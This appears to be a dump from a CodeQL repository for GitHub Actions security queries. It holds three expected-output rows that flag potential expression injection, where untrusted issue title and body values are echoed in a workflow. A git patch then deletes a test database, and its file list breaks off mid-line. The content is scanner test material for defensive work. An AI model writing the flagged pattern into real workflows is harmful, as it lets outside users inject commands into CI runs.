 | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. |
 | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. |
 | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. |
From c8e89797eb59f6c5c0e03626616a8806b6ce9cc3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Mar 2024 15:43:38 +0100 Subject: [PATCH 085/707] remove test db --- db/baseline-info.json | 1 - db/codeql-database.yml | 10 - db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 40 -> 0 bytes .../pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 40 -> 0 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 8192 -> 0 bytes .../cached-strings/pools/0/indices1/info | Bin 40 -> 0 bytes .../pools/0/indices1/page-000000 | Bin 8192 -> 0 bytes .../default/cache/cached-strings/pools/0/info | Bin 41 -> 0 bytes .../cached-strings/pools/0/metadata/info | Bin 40 -> 0 bytes .../pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../cache/cached-strings/pools/poolInfo | Bin 28 -> 0 bytes .../cache/cached-strings/tuple-pool/header | Bin 4 -> 0 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 16 -> 0 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 216 -> 0 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 320 -> 0 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 216 -> 0 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 6312 -> 0 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 16 -> 0 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 12 -> 0 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 16 -> 0 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 12 -> 0 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 16 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 12 -> 0 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 24 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-0defa4a0 | Bin 16 -> 0 bytes ...king#f6f2598d--TaintFlow-0defa4a0#0#tttttt | Bin 3200 -> 0 bytes ...Tracking#f6f2598d--TaintFlow-0defa4a0#1#tt | Bin 896 -> 0 
bytes ...TaintTracking#f6f2598d--TaintFlow-5b92615f | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-5b92615f#0# | Bin 12 -> 0 bytes ...racking#f6f2598d--TaintFlow-5b92615f#1#ttt | Bin 152 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-6e089ab6 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-6e089ab6#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-a2a08e4a | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-a2a08e4a#0# | Bin 12 -> 0 bytes ...Tracking#f6f2598d--TaintFlow-a2a08e4a#1#tt | Bin 116 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-b0571e78 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-b0571e78#0# | Bin 12 -> 0 bytes ...tTracking#f6f2598d--TaintFlow-b0571e78#1#t | Bin 88 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-b18fe878 | Bin 16 -> 0 bytes ...tTracking#f6f2598d--TaintFlow-b18fe878#0#t | Bin 2216 -> 0 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 16 -> 0 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 12 -> 0 bytes ...ow---Cached--TAccessPathFront-12309985#1#t | Bin 104 -> 0 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 16 -> 0 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 12 -> 0 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 112 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 12 -> 0 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 112 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 12 -> 0 bytes ...---Cached--TApproxAccessPathF-baba9c49#1#t | Bin 104 -> 0 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 16 -> 0 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 12 -> 0 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 24 -> 0 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 16 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 12 -> 0 bytes 
...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 12 -> 0 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 16 -> 0 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 12 -> 0 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 280 -> 0 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 16 -> 0 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 12 -> 0 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 16 -> 0 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 12 -> 0 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 16 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 12 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 12 -> 0 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 16 -> 0 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 16 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TContent | Bin 16 -> 0 bytes ...les#DataFlowPrivate#6a54d7ad--TContent#0#s | Bin 104 -> 0 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 16 -> 0 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 12 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 16 -> 0 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 2216 -> 0 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 16 -> 0 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 12 -> 0 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 16 -> 0 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 12 -> 0 bytes ...4d7ad--DataFlowType---TOption-4fb642c9#1#t | Bin 16 -> 0 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 16 -> 0 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 12 -> 0 bytes ...Unit#54592529--Unit---TOption-51176e26#1#t | Bin 16 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 16 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 12 -> 0 bytes db/db-yaml/default/cache/pages/01.pack | Bin 65 -> 0 bytes 
db/db-yaml/default/cache/pages/01.pack.d | Bin 844 -> 0 bytes db/db-yaml/default/cache/pages/02.pack | Bin 79 -> 0 bytes db/db-yaml/default/cache/pages/08.pack | Bin 87 -> 0 bytes db/db-yaml/default/cache/pages/09.pack | Bin 167 -> 0 bytes db/db-yaml/default/cache/pages/09.pack.d | Bin 2341 -> 0 bytes db/db-yaml/default/cache/pages/0b.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/0b.pack.d | Bin 292 -> 0 bytes db/db-yaml/default/cache/pages/0d.pack | Bin 84 -> 0 bytes db/db-yaml/default/cache/pages/17.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/17.pack.d | Bin 5326 -> 0 bytes db/db-yaml/default/cache/pages/20.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/20.pack.d | Bin 574 -> 0 bytes db/db-yaml/default/cache/pages/24.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/24.pack.d | Bin 6318 -> 0 bytes db/db-yaml/default/cache/pages/26.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/26.pack.d | Bin 294 -> 0 bytes db/db-yaml/default/cache/pages/27.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/27.pack.d | Bin 1493 -> 0 bytes db/db-yaml/default/cache/pages/29.pack | Bin 84 -> 0 bytes db/db-yaml/default/cache/pages/2b.pack | Bin 84 -> 0 bytes db/db-yaml/default/cache/pages/2d.pack | Bin 91 -> 0 bytes db/db-yaml/default/cache/pages/33.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/33.pack.d | Bin 393 -> 0 bytes db/db-yaml/default/cache/pages/37.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/37.pack.d | Bin 106 -> 0 bytes db/db-yaml/default/cache/pages/3c.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/3c.pack.d | Bin 916 -> 0 bytes db/db-yaml/default/cache/pages/42.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/42.pack.d | Bin 5053 -> 0 bytes db/db-yaml/default/cache/pages/45.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/45.pack.d | Bin 6001 -> 0 bytes db/db-yaml/default/cache/pages/46.pack | Bin 111 -> 0 bytes db/db-yaml/default/cache/pages/4c.pack | Bin 65 -> 0 bytes 
db/db-yaml/default/cache/pages/4c.pack.d | Bin 302 -> 0 bytes db/db-yaml/default/cache/pages/4d.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/4d.pack.d | Bin 3292 -> 0 bytes db/db-yaml/default/cache/pages/4e.pack | Bin 116 -> 0 bytes db/db-yaml/default/cache/pages/4e.pack.d | Bin 1048 -> 0 bytes db/db-yaml/default/cache/pages/54.pack | Bin 320 -> 0 bytes db/db-yaml/default/cache/pages/55.pack | Bin 91 -> 0 bytes db/db-yaml/default/cache/pages/5d.pack | Bin 221 -> 0 bytes db/db-yaml/default/cache/pages/62.pack | Bin 159 -> 0 bytes db/db-yaml/default/cache/pages/6a.pack | Bin 179 -> 0 bytes db/db-yaml/default/cache/pages/6f.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/6f.pack.d | Bin 1695 -> 0 bytes db/db-yaml/default/cache/pages/7a.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/7a.pack.d | Bin 1284 -> 0 bytes db/db-yaml/default/cache/pages/7b.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/7b.pack.d | Bin 151 -> 0 bytes db/db-yaml/default/cache/pages/84.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/84.pack.d | Bin 3788 -> 0 bytes db/db-yaml/default/cache/pages/88.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/88.pack.d | Bin 91 -> 0 bytes db/db-yaml/default/cache/pages/93.pack | Bin 113 -> 0 bytes db/db-yaml/default/cache/pages/96.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/96.pack.d | Bin 1651 -> 0 bytes db/db-yaml/default/cache/pages/9e.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/9e.pack.d | Bin 1899 -> 0 bytes db/db-yaml/default/cache/pages/a1.pack | Bin 111 -> 0 bytes db/db-yaml/default/cache/pages/a3.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/a3.pack.d | Bin 5502 -> 0 bytes db/db-yaml/default/cache/pages/aa.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/aa.pack.d | Bin 570 -> 0 bytes db/db-yaml/default/cache/pages/b5.pack | Bin 89 -> 0 bytes db/db-yaml/default/cache/pages/bd.pack | Bin 89 -> 0 bytes db/db-yaml/default/cache/pages/c2.pack | Bin 97 -> 0 bytes 
db/db-yaml/default/cache/pages/d0.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/d0.pack.d | Bin 5185 -> 0 bytes db/db-yaml/default/cache/pages/d5.pack | Bin 118 -> 0 bytes db/db-yaml/default/cache/pages/d6.pack | Bin 116 -> 0 bytes db/db-yaml/default/cache/pages/d6.pack.d | Bin 1767 -> 0 bytes db/db-yaml/default/cache/pages/d7.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/d7.pack.d | Bin 427 -> 0 bytes db/db-yaml/default/cache/pages/df.pack | Bin 86 -> 0 bytes db/db-yaml/default/cache/pages/e1.pack | Bin 96 -> 0 bytes db/db-yaml/default/cache/pages/e9.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/e9.pack.d | Bin 101 -> 0 bytes db/db-yaml/default/cache/pages/f3.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/f3.pack.d | Bin 3380 -> 0 bytes db/db-yaml/default/cache/pages/f6.pack | Bin 159 -> 0 bytes db/db-yaml/default/cache/pages/fc.pack | Bin 220 -> 0 bytes db/db-yaml/default/cache/pages/fc.pack.d | Bin 483 -> 0 bytes db/db-yaml/default/cache/pages/fd.pack | Bin 134 -> 0 bytes db/db-yaml/default/cache/predicates/00.pack | Bin 141 -> 0 bytes db/db-yaml/default/cache/predicates/01.pack | Bin 219 -> 0 bytes db/db-yaml/default/cache/predicates/02.pack | Bin 214 -> 0 bytes db/db-yaml/default/cache/predicates/04.pack | Bin 493 -> 0 bytes db/db-yaml/default/cache/predicates/06.pack | Bin 232 -> 0 bytes db/db-yaml/default/cache/predicates/07.pack | Bin 210 -> 0 bytes db/db-yaml/default/cache/predicates/08.pack | Bin 338 -> 0 bytes db/db-yaml/default/cache/predicates/09.pack | Bin 558 -> 0 bytes db/db-yaml/default/cache/predicates/18.pack | Bin 363 -> 0 bytes db/db-yaml/default/cache/predicates/1b.pack | Bin 169 -> 0 bytes db/db-yaml/default/cache/predicates/1c.pack | Bin 144 -> 0 bytes db/db-yaml/default/cache/predicates/1f.pack | Bin 341 -> 0 bytes db/db-yaml/default/cache/predicates/22.pack | Bin 204 -> 0 bytes db/db-yaml/default/cache/predicates/24.pack | Bin 218 -> 0 bytes db/db-yaml/default/cache/predicates/25.pack | Bin 169 -> 0 
bytes db/db-yaml/default/cache/predicates/26.pack | Bin 146 -> 0 bytes db/db-yaml/default/cache/predicates/27.pack | Bin 170 -> 0 bytes db/db-yaml/default/cache/predicates/28.pack | Bin 223 -> 0 bytes db/db-yaml/default/cache/predicates/29.pack | Bin 216 -> 0 bytes db/db-yaml/default/cache/predicates/2a.pack | Bin 214 -> 0 bytes db/db-yaml/default/cache/predicates/2d.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/predicates/2e.pack | Bin 340 -> 0 bytes db/db-yaml/default/cache/predicates/2f.pack | Bin 152 -> 0 bytes db/db-yaml/default/cache/predicates/32.pack | Bin 409 -> 0 bytes db/db-yaml/default/cache/predicates/3a.pack | Bin 211 -> 0 bytes db/db-yaml/default/cache/predicates/3c.pack | Bin 413 -> 0 bytes db/db-yaml/default/cache/predicates/42.pack | Bin 546 -> 0 bytes db/db-yaml/default/cache/predicates/48.pack | Bin 343 -> 0 bytes db/db-yaml/default/cache/predicates/49.pack | Bin 220 -> 0 bytes db/db-yaml/default/cache/predicates/4c.pack | Bin 151 -> 0 bytes db/db-yaml/default/cache/predicates/4e.pack | Bin 144 -> 0 bytes db/db-yaml/default/cache/predicates/55.pack | Bin 145 -> 0 bytes db/db-yaml/default/cache/predicates/57.pack | Bin 210 -> 0 bytes db/db-yaml/default/cache/predicates/58.pack | Bin 211 -> 0 bytes db/db-yaml/default/cache/predicates/59.pack | Bin 206 -> 0 bytes db/db-yaml/default/cache/predicates/5a.pack | Bin 655 -> 0 bytes db/db-yaml/default/cache/predicates/5f.pack | Bin 212 -> 0 bytes db/db-yaml/default/cache/predicates/60.pack | Bin 151 -> 0 bytes db/db-yaml/default/cache/predicates/62.pack | Bin 419 -> 0 bytes db/db-yaml/default/cache/predicates/65.pack | Bin 357 -> 0 bytes db/db-yaml/default/cache/predicates/68.pack | Bin 210 -> 0 bytes db/db-yaml/default/cache/predicates/69.pack | Bin 213 -> 0 bytes db/db-yaml/default/cache/predicates/6c.pack | Bin 206 -> 0 bytes db/db-yaml/default/cache/predicates/6f.pack | Bin 169 -> 0 bytes db/db-yaml/default/cache/predicates/72.pack | Bin 219 -> 0 bytes db/db-yaml/default/cache/predicates/73.pack 
| Bin 299 -> 0 bytes db/db-yaml/default/cache/predicates/74.pack | Bin 204 -> 0 bytes db/db-yaml/default/cache/predicates/75.pack | Bin 345 -> 0 bytes db/db-yaml/default/cache/predicates/77.pack | Bin 207 -> 0 bytes db/db-yaml/default/cache/predicates/7a.pack | Bin 213 -> 0 bytes db/db-yaml/default/cache/predicates/7b.pack | Bin 207 -> 0 bytes db/db-yaml/default/cache/predicates/7c.pack | Bin 141 -> 0 bytes db/db-yaml/default/cache/predicates/7d.pack | Bin 161 -> 0 bytes db/db-yaml/default/cache/predicates/7e.pack | Bin 220 -> 0 bytes db/db-yaml/default/cache/predicates/82.pack | Bin 209 -> 0 bytes db/db-yaml/default/cache/predicates/86.pack | Bin 209 -> 0 bytes db/db-yaml/default/cache/predicates/87.pack | Bin 206 -> 0 bytes db/db-yaml/default/cache/predicates/88.pack | Bin 291 -> 0 bytes db/db-yaml/default/cache/predicates/89.pack | Bin 144 -> 0 bytes db/db-yaml/default/cache/predicates/8d.pack | Bin 231 -> 0 bytes db/db-yaml/default/cache/predicates/8f.pack | Bin 212 -> 0 bytes db/db-yaml/default/cache/predicates/91.pack | Bin 244 -> 0 bytes db/db-yaml/default/cache/predicates/95.pack | Bin 415 -> 0 bytes db/db-yaml/default/cache/predicates/97.pack | Bin 154 -> 0 bytes db/db-yaml/default/cache/predicates/98.pack | Bin 414 -> 0 bytes db/db-yaml/default/cache/predicates/99.pack | Bin 209 -> 0 bytes db/db-yaml/default/cache/predicates/9c.pack | Bin 170 -> 0 bytes db/db-yaml/default/cache/predicates/9d.pack | Bin 170 -> 0 bytes db/db-yaml/default/cache/predicates/9e.pack | Bin 220 -> 0 bytes db/db-yaml/default/cache/predicates/a0.pack | Bin 468 -> 0 bytes db/db-yaml/default/cache/predicates/a2.pack | Bin 204 -> 0 bytes db/db-yaml/default/cache/predicates/a4.pack | Bin 140 -> 0 bytes db/db-yaml/default/cache/predicates/a8.pack | Bin 213 -> 0 bytes db/db-yaml/default/cache/predicates/a9.pack | Bin 140 -> 0 bytes db/db-yaml/default/cache/predicates/aa.pack | Bin 161 -> 0 bytes db/db-yaml/default/cache/predicates/ad.pack | Bin 206 -> 0 bytes 
db/db-yaml/default/cache/predicates/ae.pack | Bin 154 -> 0 bytes db/db-yaml/default/cache/predicates/b0.pack | Bin 568 -> 0 bytes db/db-yaml/default/cache/predicates/b2.pack | Bin 211 -> 0 bytes db/db-yaml/default/cache/predicates/b5.pack | Bin 412 -> 0 bytes db/db-yaml/default/cache/predicates/b8.pack | Bin 161 -> 0 bytes db/db-yaml/default/cache/predicates/bd.pack | Bin 250 -> 0 bytes db/db-yaml/default/cache/predicates/c1.pack | Bin 217 -> 0 bytes db/db-yaml/default/cache/predicates/c4.pack | Bin 412 -> 0 bytes db/db-yaml/default/cache/predicates/ca.pack | Bin 254 -> 0 bytes db/db-yaml/default/cache/predicates/cb.pack | Bin 170 -> 0 bytes db/db-yaml/default/cache/predicates/cc.pack | Bin 146 -> 0 bytes db/db-yaml/default/cache/predicates/cd.pack | Bin 352 -> 0 bytes db/db-yaml/default/cache/predicates/d2.pack | Bin 363 -> 0 bytes db/db-yaml/default/cache/predicates/d5.pack | Bin 260 -> 0 bytes db/db-yaml/default/cache/predicates/d8.pack | Bin 209 -> 0 bytes db/db-yaml/default/cache/predicates/dc.pack | Bin 212 -> 0 bytes db/db-yaml/default/cache/predicates/de.pack | Bin 209 -> 0 bytes db/db-yaml/default/cache/predicates/df.pack | Bin 499 -> 0 bytes db/db-yaml/default/cache/predicates/e0.pack | Bin 151 -> 0 bytes db/db-yaml/default/cache/predicates/e3.pack | Bin 353 -> 0 bytes db/db-yaml/default/cache/predicates/e4.pack | Bin 344 -> 0 bytes db/db-yaml/default/cache/predicates/e6.pack | Bin 212 -> 0 bytes db/db-yaml/default/cache/predicates/ec.pack | Bin 213 -> 0 bytes db/db-yaml/default/cache/predicates/ed.pack | Bin 223 -> 0 bytes db/db-yaml/default/cache/predicates/ee.pack | Bin 244 -> 0 bytes db/db-yaml/default/cache/predicates/f0.pack | Bin 276 -> 0 bytes db/db-yaml/default/cache/predicates/f2.pack | Bin 411 -> 0 bytes db/db-yaml/default/cache/predicates/f3.pack | Bin 213 -> 0 bytes db/db-yaml/default/cache/predicates/f6.pack | Bin 491 -> 0 bytes db/db-yaml/default/cache/predicates/f7.pack | Bin 217 -> 0 bytes db/db-yaml/default/cache/predicates/fa.pack | Bin 
207 -> 0 bytes db/db-yaml/default/cache/predicates/fb.pack | Bin 215 -> 0 bytes db/db-yaml/default/cache/predicates/fc.pack | Bin 263 -> 0 bytes db/db-yaml/default/cache/predicates/ff.pack | Bin 253 -> 0 bytes db/db-yaml/default/cache/relations/07.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/0a.pack | Bin 177 -> 0 bytes db/db-yaml/default/cache/relations/0c.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/0d.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/12.pack | Bin 177 -> 0 bytes db/db-yaml/default/cache/relations/13.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/14.pack | Bin 255 -> 0 bytes db/db-yaml/default/cache/relations/19.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/1d.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/1e.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/22.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/2b.pack | Bin 160 -> 0 bytes db/db-yaml/default/cache/relations/32.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/35.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/52.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/5a.pack | Bin 177 -> 0 bytes db/db-yaml/default/cache/relations/60.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/65.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/6e.pack | Bin 160 -> 0 bytes db/db-yaml/default/cache/relations/71.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/73.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/76.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/78.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/81.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/86.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/8a.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/92.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/9a.pack | Bin 272 -> 0 
bytes db/db-yaml/default/cache/relations/9d.pack | Bin 340 -> 0 bytes db/db-yaml/default/cache/relations/a9.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/aa.pack | Bin 272 -> 0 bytes db/db-yaml/default/cache/relations/ac.pack | Bin 109 -> 0 bytes db/db-yaml/default/cache/relations/b3.pack | Bin 272 -> 0 bytes db/db-yaml/default/cache/relations/b4.pack | Bin 160 -> 0 bytes db/db-yaml/default/cache/relations/b6.pack | Bin 177 -> 0 bytes db/db-yaml/default/cache/relations/b8.pack | Bin 435 -> 0 bytes db/db-yaml/default/cache/relations/bf.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/c4.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/c7.pack | Bin 272 -> 0 bytes db/db-yaml/default/cache/relations/ca.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/cd.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/d1.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/d6.pack | Bin 255 -> 0 bytes db/db-yaml/default/cache/relations/dc.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/e3.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/ee.pack | Bin 160 -> 0 bytes db/db-yaml/default/cache/relations/f1.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/f7.pack | Bin 143 -> 0 bytes db/db-yaml/default/cache/relations/f9.pack | Bin 126 -> 0 bytes db/db-yaml/default/cache/relations/fd.pack | Bin 160 -> 0 bytes db/db-yaml/default/cache/version | 1 - db/db-yaml/default/containerparent.rel | Bin 328 -> 0 bytes .../default/containerparent.rel.checksum | Bin 12 -> 0 bytes db/db-yaml/default/files.rel | Bin 208 -> 0 bytes db/db-yaml/default/files.rel.checksum | Bin 12 -> 0 bytes db/db-yaml/default/folders.rel | Bin 128 -> 0 bytes db/db-yaml/default/folders.rel.checksum | Bin 12 -> 0 bytes db/db-yaml/default/locations_default.rel | Bin 33384 -> 0 bytes .../default/locations_default.rel.checksum | Bin 12 -> 0 bytes db/db-yaml/default/pools/0/buckets/info | Bin 40 -> 0 bytes 
.../default/pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes db/db-yaml/default/pools/0/info | Bin 33 -> 0 bytes db/db-yaml/default/pools/0/metadata/info | Bin 40 -> 0 bytes .../default/pools/0/metadata/page-000000 | Bin 16384 -> 0 bytes .../default/pools/0/pageDump/page-000000000 | 55 --- db/db-yaml/default/pools/1/buckets/info | Bin 40 -> 0 bytes .../default/pools/1/buckets/page-000000 | Bin 8192 -> 0 bytes db/db-yaml/default/pools/1/ids1/info | Bin 40 -> 0 bytes db/db-yaml/default/pools/1/ids1/page-000000 | Bin 8192 -> 0 bytes db/db-yaml/default/pools/1/indices1/info | Bin 40 -> 0 bytes .../default/pools/1/indices1/page-000000 | Bin 8192 -> 0 bytes db/db-yaml/default/pools/1/info | Bin 41 -> 0 bytes db/db-yaml/default/pools/1/metadata/info | Bin 40 -> 0 bytes .../default/pools/1/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/1/pageDump/page-000000000 | Bin 1048592 -> 0 bytes db/db-yaml/default/pools/poolInfo | Bin 32 -> 0 bytes db/db-yaml/default/sourceLocationPrefix.rel | Bin 4 -> 0 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 12 -> 0 bytes .../default/strings/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/metadata/page-000000 | Bin 16384 -> 0 bytes .../default/strings/0/pageDump/page-000000000 | 2 - db/db-yaml/default/yaml.rel | Bin 33384 -> 0 bytes db/db-yaml/default/yaml.rel.checksum | Bin 12 -> 0 bytes db/db-yaml/default/yaml_locations.rel | Bin 11128 -> 0 bytes .../default/yaml_locations.rel.checksum | Bin 12 -> 0 bytes db/db-yaml/default/yaml_scalars.rel | Bin 12540 -> 0 bytes db/db-yaml/default/yaml_scalars.rel.checksum | Bin 12 -> 0 bytes db/db-yaml/yaml.dbscheme | 80 ----- ...-diagnostics-add-20240301T120559.348Z.json | 0 ...-diagnostics-add-20240301T120600.004Z.json | 0 .../database-create-20240301.130558.279.log | 321 ------------------ ...tabase-index-files-20240301.130558.974.log | 44 --- db/src.zip | Bin 20479 -> 0 bytes 377 files changed, 514 deletions(-) delete mode 100644 db/baseline-info.json 
delete mode 100644 db/codeql-database.yml delete mode 100644 db/db-yaml/default/cache/.lock delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/buckets/info delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/ids1/info delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/ids1/page-000000 delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/indices1/info delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/indices1/page-000000 delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/info delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/metadata/info delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 delete mode 100644 db/db-yaml/default/cache/cached-strings/pools/poolInfo delete mode 100644 db/db-yaml/default/cache/cached-strings/tuple-pool/header delete mode 100644 